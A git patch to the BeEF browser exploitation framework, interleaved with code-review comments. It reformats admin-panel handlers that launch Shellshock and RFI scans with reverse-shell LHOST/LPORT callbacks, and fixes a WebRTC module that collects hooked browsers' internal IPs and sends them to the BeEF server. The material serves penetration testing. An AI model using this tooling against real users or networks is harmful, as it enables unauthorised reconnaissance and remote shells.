From 944ba747daa0a834b7152e2a5ead3d1e661156f9 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Thu, 5 Feb 2015 12:35:23 +0100 Subject: [PATCH] Fixed a bug in WebRTC command module, prevented duplicates in NetworkHost db table, removed unnecessary code. --- Gemfile | 2 +- config.yaml | 4 +- .../ui/panel/tabs/ZombieTabNetwork.js | 267 +++++++++--------- extensions/network/extension.rb | 2 - extensions/network/network.rb | 13 - .../host/get_internal_ip_webrtc/command.js | 9 +- modules/host/get_internal_ip_webrtc/module.rb | 8 +- 7 files changed, 153 insertions(+), 152 deletions(-) delete mode 100644 extensions/network/network.rb diff --git a/Gemfile b/Gemfile index 11297d839..36547f929 100644 --- a/Gemfile +++ b/Gemfile @@ -41,7 +41,7 @@ gem "msfrpc-client" # Metasploit Integration extension gem "rubyzip", ">= 1.0.0" gem "rubydns", "0.7.0" # DNS extension gem "geoip" # geolocation support -gem "dm-serializer" # network extension +gem "dm-serializer" # network extension # For running unit tests if ENV['BEEF_TEST'] diff --git a/config.yaml b/config.yaml index 50c772592..a390b6bb9 100644 --- a/config.yaml +++ b/config.yaml @@ -10,7 +10,7 @@ beef: # More verbose messages (server-side) debug: false # More verbose messages (client-side) - client_debug: false + client_debug: true # Used for generating secure tokens crypto_default_value_length: 80 @@ -33,7 +33,7 @@ beef: # NOTE: A poll timeout of less than 5,000 (ms) might impact performance # when hooking lots of browsers (50+). # Enabling WebSockets is generally better (beef.websocket.enable) - xhr_poll_timeout: 5000 + xhr_poll_timeout: 1000 # Reverse Proxy / NAT # If BeEF is running behind a reverse proxy or NAT diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js index 9dd47a21c..9effc1d18 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js 
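Review bot: The two default changes in config.yaml look like local debugging settings committed by accident: `client_debug: true` and `xhr_poll_timeout: 1000` are not mentioned in the commit message. The second also contradicts the NOTE directly above it, which warns that a poll timeout below 5,000 ms might impact performance when many browsers are connected. This applies to both config.yaml hunks (`@@ -10,7 +10,7 @@` and `@@ -33,7 +33,7 @@`). Unless the new defaults are intended, restore `client_debug: false` and `xhr_poll_timeout: 5000`; if they are intended, update the NOTE so the comment and the value agree.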
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js @@ -30,8 +30,8 @@ ZombieTab_Network = function(zombie) { commands_statusbar.update_fail("Error getting module id for '"+mod_name+"'"); } }); - return id; - } + return id; + }; /* * The panel that displays all identified network services grouped by host @@ -756,8 +756,6 @@ ZombieTab_Network = function(zombie) { sortInfo: {field: 'ip', direction: 'ASC'} }); - var req_pagesize = 50; - var services_panel_bbar = new Ext.PagingToolbar({ pageSize: req_pagesize, store: services_panel_store, 
@@ -811,131 +809,144 @@ ZombieTab_Network = function(zombie) { var ip = record.get('ip'); var port = record.get('port'); var proto = record.get('proto'); - grid.rowCtxMenu = new Ext.menu.Menu({ - items: [{ - text: 'Scan ('+ip+':'+port+'/'+proto+')', - iconCls: 'network-host-ctxMenu-host', - menu: { - xtype: 'menu', - items: [{ - text: 'Fingerprint HTTP', - iconCls: 'network-host-ctxMenu-fingerprint', - handler: function() { - var mod_id = get_module_id("internal_network_fingerprinting"); - commands_statusbar.update_sending('Fingerprinting ' + ip + '...'); - $jwterm.ajax({ - contentType: 'application/json', - data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}), - dataType: 'json', - type: 'POST', - url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, - async: false, - processData: false, - success: function(data){ - commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); - }, - error: function(){ - commands_statusbar.update_fail('Error sending command'); - } - }); - } - },{ - text: 'CORS Scan', - iconCls: 'network-host-ctxMenu-cors', - handler: function() { - var mod_id = get_module_id("cross_origin_scanner"); - commands_statusbar.update_sending('CORS scanning ' + ip + '...'); - $jwterm.ajax({ - contentType: 'application/json', - data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}), - dataType: 'json', - type: 'POST', - url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, - async: false, - processData: false, - success: function(data){ - commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); - }, - error: function(){ - commands_statusbar.update_fail('Error sending command'); - } - }); - } - },{ - text: 'Shellshock Scan', - iconCls: 'network-host-ctxMenu-shellshock', - handler: function() { - var mod_id = get_module_id("shell_shock_scanner"); - var lhost = prompt("Enter local IP for connect back shell:", 'LHOST'); - if (!lhost) { - 
commands_statusbar.update_fail('Cancelled'); - return; - } - var lport = prompt("Enter local port for connect back shell:", 'LPORT'); - if (!lport) { - commands_statusbar.update_fail('Cancelled'); - return; - } - alert("Now start your reverse shell handler on " + lhost + ':' + lport); - commands_statusbar.update_sending('Shellshock scanning ' + ip + '...'); - $jwterm.ajax({ - contentType: 'application/json', - data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport}), - dataType: 'json', - type: 'POST', - url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, - async: false, - processData: false, - success: function(data){ - commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); - }, - error: function(){ - commands_statusbar.update_fail('Error sending command'); - } - }); - } - },{ - text: 'RFI Scan', - iconCls: 'network-host-ctxMenu-php', - handler: function() { - var mod_id = get_module_id("rfi_scanner"); - var lhost = prompt("Enter local IP for connect back shell:", 'LHOST'); - if (!lhost) { - commands_statusbar.update_fail('Cancelled'); - return; - } - var lport = prompt("Enter local port for connect back shell:", 'LPORT'); - if (!lport) { - commands_statusbar.update_fail('Cancelled'); - return; - } - alert("Now start your reverse shell handler on " + lhost + ':' + lport); - commands_statusbar.update_sending('Shellshock scanning ' + ip + '...'); - $jwterm.ajax({ - contentType: 'application/json', - data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}), - dataType: 'json', - type: 'POST', - url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, - async: false, - processData: false, - success: function(data){ - commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); - }, - error: function(){ - commands_statusbar.update_fail('Error sending command'); - } - 
}); - } - }] - } - }] - }); - grid.rowCtxMenu.showAt(e.getXY()); + grid.rowCtxMenu = new Ext.menu.Menu({ + items: [{ + text: 'Scan (' + ip + ':' + port + '/' + proto + ')', + iconCls: 'network-host-ctxMenu-host', + menu: { + xtype: 'menu', + items: [{ + text: 'Fingerprint HTTP', + iconCls: 'network-host-ctxMenu-fingerprint', + handler: function () { + var mod_id = get_module_id("internal_network_fingerprinting"); + commands_statusbar.update_sending('Fingerprinting ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function (data) { + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function () { + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }, { + text: 'CORS Scan', + iconCls: 'network-host-ctxMenu-cors', + handler: function () { + var mod_id = get_module_id("cross_origin_scanner"); + commands_statusbar.update_sending('CORS scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function (data) { + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function () { + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }, { + text: 'Shellshock Scan', + iconCls: 'network-host-ctxMenu-shellshock', + handler: function () { + var mod_id = get_module_id("shell_shock_scanner"); + var lhost = prompt("Enter local IP for connect back shell:", 'LHOST'); + if (!lhost) { + commands_statusbar.update_fail('Cancelled'); + return; + } + var 
lport = prompt("Enter local port for connect back shell:", 'LPORT'); + if (!lport) { + commands_statusbar.update_fail('Cancelled'); + return; + } + alert("Now start your reverse shell handler on " + lhost + ':' + lport); + commands_statusbar.update_sending('Shellshock scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({ + "rproto": proto, + "rhost": ip, + "rport": port, + "lhost": lhost, + "lport": lport + }), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function (data) { + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function () { + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }, { + text: 'RFI Scan', + iconCls: 'network-host-ctxMenu-php', + handler: function () { + var mod_id = get_module_id("rfi_scanner"); + var lhost = prompt("Enter local IP for connect back shell:", 'LHOST'); + if (!lhost) { + commands_statusbar.update_fail('Cancelled'); + return; + } + var lport = prompt("Enter local port for connect back shell:", 'LPORT'); + if (!lport) { + commands_statusbar.update_fail('Cancelled'); + return; + } + alert("Now start your reverse shell handler on " + lhost + ':' + lport); + commands_statusbar.update_sending('Shellshock scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({ + "rproto": proto, + "rhost": ip, + "rport": port, + "lhost": lhost, + "lport": lport, + "payload": "reverse_php" + }), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function (data) { + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function () { + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }] 
+ } + }] + }); + grid.rowCtxMenu.showAt(e.getXY()); }, - afterrender: function(datagrid) { - datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} }); - } + afterrender: function (datagrid) { + datagrid.store.reload({params: {nonce: Ext.get("nonce").dom.value}}); + } } }); diff --git a/extensions/network/extension.rb b/extensions/network/extension.rb index f76877c19..1455caac6 100644 --- a/extensions/network/extension.rb +++ b/extensions/network/extension.rb @@ -17,11 +17,9 @@ end end end -require 'extensions/network/network' require 'extensions/network/models/network_host' require 'extensions/network/models/network_service' require 'extensions/network/api' require 'extensions/network/rest/network' - require 'dm-serializer' diff --git a/extensions/network/network.rb b/extensions/network/network.rb deleted file mode 100644 index 9a8eed9e2..000000000 --- a/extensions/network/network.rb +++ /dev/null @@ -1,13 +0,0 @@ -# -# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - http://beefproject.com -# See the file 'doc/COPYING' for copying permission -# -module BeEF -module Extension -module Network - - -end -end -end diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js index 277591d05..572fa33db 100755 --- a/modules/host/get_internal_ip_webrtc/command.js +++ b/modules/host/get_internal_ip_webrtc/command.js @@ -22,7 +22,10 @@ beef.execute(function() { // Upon an ICE candidate being found // Grep the SDP data for IP address data rtc.onicecandidate = function (evt) { - if (evt.candidate) grepSDP(evt.candidate.candidate); + if (evt.candidate){ + console.log("a="+evt.candidate.candidate); + grepSDP("a="+evt.candidate.candidate); + } }; // Create an SDP offer 
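Review bot: In the 'RFI Scan' handler the status message still reads `commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');`, carried over unchanged from the Shellshock handler by this re-indentation, so the operator sees the wrong module name. It should read `commands_statusbar.update_sending('RFI scanning ' + ip + '...');`. The four handlers also repeat the same `$jwterm.ajax` POST and differ only in module name and payload, so a small local helper taking `(mod_name, payload)` would keep such messages from drifting apart. The enclosing listener and the `ZombieTab_Network` function begin outside the hunk.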
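Review bot: The `console.log("a="+evt.candidate.candidate);` line added to `rtc.onicecandidate` looks like leftover debugging output. The same file already sends diagnostics through `beef.debug(...)` (visible in the `processIPs` hunk), so either drop the line or use `beef.debug("a="+evt.candidate.candidate);` for consistency. The `"a="` prefix is the actual fix and deserves a short comment, for example `// candidate strings lack the SDP "a=" attribute prefix that grepSDP expects`. grepSDP is defined outside the hunk, so confirm that wording against its pattern.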
@@ -30,12 +33,12 @@ beef.execute(function() { grepSDP(offerDesc.sdp); rtc.setLocalDescription(offerDesc); }, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); }); - + function processIPs(newAddr) { if (newAddr in addrs) return; else addrs[newAddr] = true; var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; }); - beef.debug("Found IPs: "+ displayAddrs.join(",")) + beef.debug("Found IPs: "+ displayAddrs.join(",")) beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(",")); } diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb index 9c516e87f..b51a60613 100755 --- a/modules/host/get_internal_ip_webrtc/module.rb +++ b/modules/host/get_internal_ip_webrtc/module.rb @@ -25,9 +25,11 @@ class Get_internal_ip_webrtc < BeEF::Core::Command next unless ip =~ /^[\d\.]+$/ next if ip =~ /^0\.0\.0\.0$/ next unless BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser has network interface #{ip}") - r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid) - r.save + if BeEF::Core::Models::NetworkHost.all(:ip => ip).empty? # prevent duplicates + print_debug("Hooked browser has network interface #{ip}") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid) + r.save + end end end end
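Review bot: The duplicate check `NetworkHost.all(:ip => ip).empty?` keys on the IP alone, so a second hooked browser that reports the same address never gets a NetworkHost row linked to its own `hooked_browser_id`. Private ranges such as 192.168.x.x repeat across unrelated networks, which makes that collision likely. If per-browser attribution matters, scope the lookup: `if BeEF::Core::Models::NetworkHost.all(:hooked_browser_id => session_id, :ip => ip).empty?`. The check-then-save is also not atomic and the result of `r.save` is ignored, so a failed or racing insert goes unnoticed. The model definition and the enclosing method are outside the hunk, so whether a unique index already exists cannot be told from here.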